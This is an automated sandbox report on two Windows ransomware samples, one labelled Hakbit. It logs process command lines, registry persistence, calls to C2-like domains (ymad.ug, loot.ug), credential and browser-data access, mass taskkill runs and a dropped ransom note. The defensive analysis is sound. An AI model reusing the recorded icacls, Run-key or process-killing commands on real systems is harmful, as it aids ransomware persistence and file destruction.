SHA512 ddf8c53e1e1888084fa5422f297cc3ba9d97f7576c36f6b633ce67ca789127f7e259e9fb374fcbced66f883dadde0717d81ecce9776770bf07d8cf3b94b1a43f

Analysis: behavioral18

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"

Signatures

Renames multiple (188) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\fdf18f50-760e-4316-bf0d-620913ba5a2f\\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1804 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 1804 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 1804 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 1804 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 1804 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 1804 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3064 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3064 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3064 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3064 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3064 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3064 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 1052 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 1052 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 1052 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\fdf18f50-760e-4316-bf0d-620913ba5a2f" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1804 -ip 1804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1804 -s 2096

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --ForNetRes "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1 IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Service 3064 "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Service 1052 "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4100 -ip 4100

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4100 -s 1608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1052 -ip 1052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 1644

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 ymad.ug udp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 172.67.139.220:443 api.2ip.ua tcp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/1804-0-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/1804-2-0x0000000000500000-0x0000000000600000-memory.dmp

memory/1804-3-0x0000000000400000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Local\fdf18f50-760e-4316-bf0d-620913ba5a2f\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

MD5 ead18f3a909685922d7213714ea9a183
SHA1 1270bd7fd62acc00447b30f066bb23f4745869bf
SHA256 5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18
SHA512 6e532d9c3d186e4dac38823ae9152056346e283613f0caf088b21a1b3e5f4f6cf3bad8c407168b1072895a386e3be0b8c11ad1cb326d3d3ff0eb8562052def91

memory/1804-16-0x0000000000400000-0x0000000000476000-memory.dmp

memory/1804-15-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/3064-18-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/3064-19-0x0000000000400000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 6e944e9afbcebcc49200b0f58fa086a8
SHA1 9b29f25f7e7feea6062ae390c38a44323b6b8086
SHA256 b3bc7569e4ec8e8936a9f5a21d56915a18ed55c66201a7b5faa398112d5e2e56
SHA512 c3306c2603ef956e40c149ca6d86d5c324ab0bd159c9797ac7b98af2d34ce13cd5f6d92a9fee8b47c6100aa449c2bb7e4aad6feab670656a05149dce5789e52e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 f54d0841284aaf9310e318f32e6aceec
SHA1 070a84ffc40d70f419ea479c4f92297258b6f4af
SHA256 a8f07a193f479667d63a6f8d6b803a13fdd1a8152941c11d81bac3b139e55b8a
SHA512 67f3922bf447a2600a73689b6eeab6a7fed5d1c595ae1fc476f195a964d7788affb064ed9b6a9783d70e947ca31ce2b5c19d200a6e9cf9777be6ce179c15a9d1

memory/3064-26-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/3064-27-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/3064-28-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/1052-30-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/1052-31-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/1052-38-0x0000000000400000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0BHOTC3C\geo[1].json

MD5 a10a6a594eab8ff8c3534e253d8decd1
SHA1 aaec447248e1cc33a8c812f38ad6045c5ab2a51c
SHA256 3fb0544873064c132d91960afa0da483afcf60e9821506edb7adb8f94acf8766
SHA512 eb5198eb924118f34b2f2b6f86bcfe192ad6677505370b5dbadb788080b64a137d55a6e564221945617d029fca43ea197ad81f65672b7b26c18987d0f0faf8ae

memory/3064-41-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/3120-42-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4100-45-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/4100-46-0x0000000000400000-0x00000000004A9000-memory.dmp

memory/1052-47-0x0000000000400000-0x00000000004A9000-memory.dmp

C:\Users\Public\Documents\_readme.txt

MD5 d75064cfaac9c92f52aadf373dc7e463
SHA1 36ea05181d9b037694929ec81f276f13c7d2655c
SHA256 163ec5b903b6baadd32d560c44c1ea4dce241579a7493eb32c632eae9085d508
SHA512 43387299749f31c623c5dd4a53ff4d2eff5edfeb80fd4e2edd45860b5c9367d2767ae2ee9b60824b57301999dd2bd995b7d3bd5e7187e447aed76106272559d1

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

MD5 f782b09fd215d3d9bb898d61ea2e7a37
SHA1 a382348e9592bdf93dd10c49773b815a992fa7c7
SHA256 7bd4646090dff9875e08ea00e5727b11be19fcb850344856e66360c152835694
SHA512 9342bd7a0cbabd7e699ea545897a6403371a0034e4bea067a9662dad9e492c5fa9b27efa4c850e1c001c79d6a76ffe0dacb6831010e41c8d5e2a92bd5b898606

C:\ProgramData\Package Cache\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}v48.108.8828\dotnet-host-6.0.27-win-x64.msi

MD5 c3c0fe1bf5f38a6c89cead208307b99c
SHA1 df5d4f184c3124d4749c778084f35a2c00066b0b
SHA256 f4f6d008e54b5a6bac3998fc3fe8e632c347d6b598813e3524d5489b84bd2eaf
SHA512 0f3e96d16c512e37025b04ff7989d60126c3d65fe868dbcfbeae4dac910ce04fc52d1089f0e41ce85c2def0182a927fdcc349094e74cdd21b45a42fde7f01806

C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

MD5 b2e47100abd58190e40c8b6f9f672a36
SHA1 a754a78021b16e63d9e606cacc6de4fcf6872628
SHA256 889217bcb971387bc3cb6d76554646d2b0822eceb102320d40adf2422c829128
SHA512 d30da8c901e063df5901d011b22a01f884234ddddd44b9e81b3c43d93a51e10342074523339d155d69ff03a03a1df66c7d19e0137a16f47735b5b600616ca2a9

C:\ProgramData\Package Cache\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}v56.64.8781\dotnet-runtime-7.0.16-win-x64.msi

MD5 f7562e8f61c00d1d0cddb2870f9dce1c
SHA1 b8f96799fcca4446fd77144121c2175163f8cc31
SHA256 a3b6490bbcfdf4975f5d92674ab2a53c02d01b9f1d4f99d6cd3d4dfaf003542d
SHA512 d81f99bc42277201b8b29c14f25b53a20c2694508c73d689eb6b54eba7bd4fdd2330f06159528a072bf60187d6570cf276bb91aa963420b8c0e843ff5a424c6b

C:\ProgramData\Package Cache\{E634F316-BEB6-4FB3-A612-F7102F576165}v48.108.8836\windowsdesktop-runtime-6.0.27-win-x64.msi

MD5 25c46a917aa6e2562abe837aa9949d53
SHA1 003c76394cfe4d3f8132ca9e5451a3868f0e4c7f
SHA256 09dec0ffa7ce629c36098390ab47db38f3b625cb7b99d571b7a11f81d735c96e
SHA512 fe592b4be1c2498e032d2c093559572ce02778d3d6e06fd02331056642abb550e23ac7bf18cb917c09e5238a55f8b61173be411dff944a2be6d83f87e0197aac

Analysis: behavioral20

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"

Signatures

Disables service(s)

evasion execution

Hakbit

ransomware hakbit

Hakbit family

hakbit

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Reads user/profile data of web browsers

spyware stealer

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
